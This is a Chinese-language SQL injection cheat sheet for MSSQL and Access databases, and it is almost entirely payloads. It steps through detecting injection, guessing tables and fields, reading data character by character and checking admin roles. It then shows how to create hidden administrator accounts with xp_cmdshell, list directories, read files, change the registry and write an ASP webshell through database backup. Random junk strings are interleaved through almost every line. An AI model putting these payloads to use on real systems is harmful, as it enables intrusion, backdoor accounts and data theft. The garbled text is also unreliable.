1.判断是否有注入;and 1=1 ;and 1=2 'a$/ !~X
2.初步判断是否是mssql ;and user>0 #c9MVQ_
b#n
3.注入参数是字符'and [查询条件] and ''=' U
!%IC7@
>fD%lq;
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Ex6Kxd}8
R<^E?FI
5.判断数据库系统 9fCU+s
q(BRJ(
;and (select count(*) from sysobjects)>0 mssql ;Mr Q1
\"$q=%vD
;and (select count(*) from msysobjects)>0 access 3h6,x0AG
Equ%6x
aM:tg1g
/K;A bE
6.猜数据库 ;and (select Count(*) from [数据库名])>0 v7v>
^ '_Fd
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 rEWuWv$
"$q"Kilj%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ob/HO(h3
T0 cm+|S
9.(1)猜字段的ascii值(access) D\E"v,Y\+O
~/Y8wxg
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 .tsXQf
~`5[Li:eP
(2)猜字段的ascii值(mssql) SN`L@/I
|T-Ytuy8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }S%}%1pG7
m"o=R\C
10.测试权限结构(mssql) Mb97S]878I
Ifq|MZ\
;a[3RqmKW
1yeD-M"w
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |7.X)h`
Z*(OcQ-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- bNoZ{ 7
w)h"?'m~
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- QwuSo{G
Ko
"JH=<
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5U*${
C*Qx
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- s}DNu<"g
k1LbWR1%wB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hJX;/~L
% QaWg2Y=
;and 1=(select IS_MEMBER('db_owner'));-- 9gZS)MZ
!_?HSDAj"n
z[JM ]Wy
}(WUZ^L
11.添加mssql和系统的帐户 V3axwg_
@Q:?,
;exec master.dbo.sp_addlogin username;-- #Zn+-Ih
;exec master.dbo.sp_password null,username,password;-- Rb
<{o8
, _ xJ9_
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- k;.<DN
UYpln[S
;exec master.dbo.xp_cmdshell 'net user username password VD{_6
$<f+CtD4
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ePxf.U
Z
eWstw7
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Ge24Lp;Y6
oJI+c+e"
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- W\e!rq
t2qWB[r
fi6_yFl
z7a@'+'
12.(1)遍历目录 w_Z*X5u
sZokiFJ
;create table dirs(paths varchar(100), id int) _$v$v$74^
^AO2%09.S
;insert dirs exec master.dbo.xp_dirtree 'c:\' DyQvk
1z3I^gI*i
;and (select top 1 paths from dirs)>0 L.a~vk
1
],wzZhA
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ; d}
<q|eG\01S
XsMETl"Av4
;kVo? W]
(2)遍历目录 pf0uwXo
aQ)g7C
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ZaFqGcS~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 _3gF~qr
dW#l3_'3T
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 a0
w
HGW;] 8xl
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ,Nev7X[0
{1GIiP-U
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 "~IGE3{
";59,\6
u?8e>a
]8opI\
13.mssql中的存储过程 -} +PE 4fh
lpefOnO[
xp_regenumvalues 注册表根键, 子键 D&8*4>
>Wj8[9zf
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 bvo
}b-]E
cp+eh
xp_regread 根键,子键,键值名 @'S !G"\
}$s._)a
;exec xp_regread r}t%DH
uC1v^!D
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 et}s yPH
%W$?*Tm
xp_regwrite 根键,子键, 值名, 值类型, 值 ?^:
xNRE$j
1;+(HB
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 q5~fU$ ,
B 6,X)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7me1:}4
R<1[hH9"o
xp_regdeletevalue 根键,子键,值名 /?:]f
fOO[`"'Pq
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \"A~ks~
'gz@UE1
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 @nF#\
_"[O=h:
]F,v#6qi
LD}ZuCp!
14.mssql的backup创建webshell O.P:~
LpSd/_^b
use model %:.00F([r
SyR[G*djl
create table cmd(str image); $RV'DQO
-ID!kZx
insert into cmd(str) values (''); n15lX,FI
CEb .?B
backup database model to disk='c:\l.asp'; O7T wM Yh
&k {1N.
ehls:)F
)Y,>cg:z~
15.mssql内置函数 ^2um.`8
,0[h`FN
;and (select @@version)>0 获得Windows的版本号 LgS.%Mn
^'aMp}3iu
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .;9I:YB$
9Z_98Rh
;and (select user_name())>0 爆当前系统的连接用户 V9kL\Ys
dg42K`E
;and (select db_name())>0 得到当前连接的数据库 ,LJX
_p=O*$b.
K)t+lJ
}\!38{&
16.简洁的webshell C$$lJ=>
[z`m`9Aq
use model FA;uu\
lO0 PZnW9
create table cmd(str image); kculHIa\.
|JH1?n
insert into cmd(str) values (''); AZYu/k
ySwvjP7f
backup database model to disk='g:\wwwtest\l.asp';